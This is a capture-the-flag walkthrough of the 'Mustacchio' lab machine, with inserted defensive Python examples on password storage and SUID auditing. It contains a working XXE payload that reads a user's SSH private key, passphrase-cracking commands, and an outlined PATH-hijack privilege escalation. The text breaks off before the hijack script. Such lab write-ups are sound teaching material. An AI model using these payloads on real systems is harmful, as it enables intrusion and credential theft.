Start by running Nmap on all ports. We then find that SSH is open, a website is served on port 80, and an admin login page sits on port 8765.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
| 256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_ 256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gobuster
Next, I ran Gobuster, which found the directory /custom. In that folder we find a file called users.bak.
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt | tee gobuster.log
SQLite3
Once users.bak is downloaded, file tells us that it is a SQLite database.
file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2
It can be opened with the command sqlite3 users.bak, and we can view the content as follows:
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
Cracking the admin password
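The sqlite3 output above is the point where a defender should pause: the users table stores a bare 40-hex-digit value with no salt and no work factor, which is exactly why it is worth cracking offline. The Python below is an added example, not code from the writeup or from the Mustacchio box. The only page-derived value is the users row; the hash_password/verify_password functions and their $scrypt$ storage format are this example's own construction, showing the shape the row should have had.

```python
# Added example, not part of the writeup: what the users.bak row tells a
# defender, and how the same credential should have been stored instead.
import hashlib
import hmac
import os
from typing import Optional

# The row recovered from users.bak (value copied from the writeup).
ADMIN_ROW = "admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b"

# Digest lengths in hex digits for common unsalted hashes.
HEX_DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}


def parse_users_row(row: str) -> tuple:
    """Split a 'user|digest' line as printed by the sqlite3 shell."""
    user, digest = row.split("|", 1)
    return user, digest


def classify_digest(value: str) -> str:
    """Describe a stored password value by its shape alone (no cracking)."""
    if value.startswith("$scrypt$"):
        return "salted scrypt with work factor (this example's own format)"
    if value and all(c in "0123456789abcdef" for c in value.lower()):
        algo = HEX_DIGEST_LENGTHS.get(len(value))
        if algo:
            return (f"bare {len(value)}-hex-digit digest, consistent with an "
                    f"unsalted {algo} hash: no salt, no work factor")
    return "unrecognised format"


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Store a password as salted scrypt; the salt is random per user."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)
    # Hypothetical self-describing format: $scrypt$log2(N)$r$p$salt$key
    return f"$scrypt$14$8$1${salt.hex()}${key.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute scrypt with the stored parameters and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 7 or parts[1] != "scrypt":
        return False  # legacy or foreign format: force a reset instead of guessing
    _, _, log_n, r, p, salt_hex, key_hex = parts
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=2 ** int(log_n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(key.hex(), key_hex)


if __name__ == "__main__":
    user, digest = parse_users_row(ADMIN_ROW)
    print(user, "->", classify_digest(digest))
    stored = hash_password("example-only")
    print(classify_digest(stored), verify_password("example-only", stored))
```

classify_digest only reasons about length and alphabet, so it cannot prove which algorithm produced the row; the point is that a fixed-length unsalted digest lets every candidate password be tested with one cheap hash call, while the scrypt form ties each guess to a per-user salt and a tunable cost.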
Login to the admin page
Once we have the credentials, we can use them to log in to the admin page on port 8765. On this page we can "Add a comment on the website". If we inspect the source code of the site, we find the following.
<script type="text/javascript">
  //document.cookie = "Example=/auth/dontforget.bak";
  function checktarea() {
    let tbox = document.getElementById("box").value;
    if (tbox == null || tbox.length == 0) {
      alert("Insert XML Code!")
    }
  }
</script>
</head>
<body>
<!-- Barry, you can now SSH in using your key!-->
This gives us three pieces of valuable information:
- Someone called Barry can log in over SSH with his key.
- Since we can pass XML to the submit form, an XXE attack is the way forward.
- The path /auth/dontforget.bak looks interesting.
Starting from the bottom, we can download dontforget.bak and view its content with cat.
cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
This gives us the basic XML form we need to provide. We can combine it with an XXE payload to read Barry's id_rsa key.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<name>&name;</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
The declared entity has to be referenced somewhere in the document (here in the name field) for the parser to expand it; the returned comment then contains Barry's id_rsa private key.
Once the id_rsa is obtained, we can try to log in over SSH as Barry. Remember to set the key's permissions first with chmod 600 id_rsa.
ssh barry@$IP -i id_rsa
However, we are prompted for a passphrase, which is not the same password we used to log in to the admin page.
Obtain the password with John
We can use ssh2john and John the Ripper to crack the passphrase.
First, convert the key to the right format, then run John against it.
ssh2john id_rsa > barryhash
john barryhash --wordlist=/usr/share/wordlists/rockyou.txt
Get first flag
Once we have logged in as Barry, we can get the first flag by viewing the file /home/barry/user.txt.
Get root
Now we start by looking for SUID binaries with the command find / -perm -u=s -type f 2>/dev/null,
which shows that /home/joe/live_log runs as root.
If we run strings on that file, we find this interesting snippet.
tail -f /var/log/nginx/access.log
This looks like a command the binary executes. The proper way to confirm it would be some reverse engineering, but since we already know roughly what to look for, this is sufficient.
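What makes live_log dangerous is the bare command name: a SUID root binary that calls tail without a path lets the caller's PATH decide which tail runs. The following Python is an added example, not code from the writeup or the box, that audits a filesystem for this pattern: it walks for SUID files, extracts printable strings the way strings(1) does, and flags any that start with a common command name without a leading slash. The command list, the helper names and the sample binary bytes are this example's own constructions.

```python
# Added example, not part of the writeup: audit SUID binaries for commands
# spawned by bare name, the weakness live_log exhibits.
import os
import re
import stat

# Names a setuid helper commonly hands to system()/popen(); constructed list.
COMMON_COMMANDS = ("tail", "head", "cat", "grep", "awk", "sed", "cp", "mv",
                   "rm", "tar", "find", "ls", "ps", "kill", "id", "sh", "bash")

# A string is suspicious when it begins with one of those names and then a
# space or the end of the string; "/usr/bin/tail ..." does not match.
BARE_COMMAND = re.compile(r"^(?:%s)(?:\s|$)" % "|".join(COMMON_COMMANDS))


def printable_strings(data: bytes, min_len: int = 4):
    """Yield runs of printable ASCII of at least min_len bytes, like strings(1)."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group().decode("ascii")


def unqualified_commands(data: bytes) -> list:
    """Strings in a binary that start with a bare command name (no leading slash)."""
    return [s for s in printable_strings(data) if BARE_COMMAND.match(s)]


def is_suid(path: str) -> bool:
    """True for regular files with the setuid bit; symlinks are not followed."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def audit_suid(root: str = "/") -> dict:
    """Map each SUID file under root to the suspicious strings found in it."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if not is_suid(path):
                    continue
                with open(path, "rb") as handle:
                    hits = unqualified_commands(handle.read())
            except OSError:
                continue  # unreadable or vanished file: skip, do not abort the audit
            if hits:
                findings[path] = hits
    return findings


# Constructed sample mimicking the strings output quoted in the writeup:
# an ELF-like header, one bare command, one fully qualified command, noise.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 +
                 b"tail -f /var/log/nginx/access.log\x00" +
                 b"/usr/bin/id -u\x00" + b"logs\x00")


if __name__ == "__main__":
    print("sample:", unqualified_commands(SAMPLE_BINARY))
    for path, hits in audit_suid("/").items():
        print(path, hits)
```

The audit only produces candidates, since a string can be data rather than a command, but every hit deserves a look. The fix on the binary side is to call an absolute path such as /usr/bin/tail or to set a fixed PATH before spawning anything, and a root-owned SUID helper living in a user's home directory is itself a finding.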
Let's try to create a custom tail binary and hijack the PATH. The content of tail should look like this: a Bash script that copies /bin/bash to the /tmp folder and sets the correct privileges.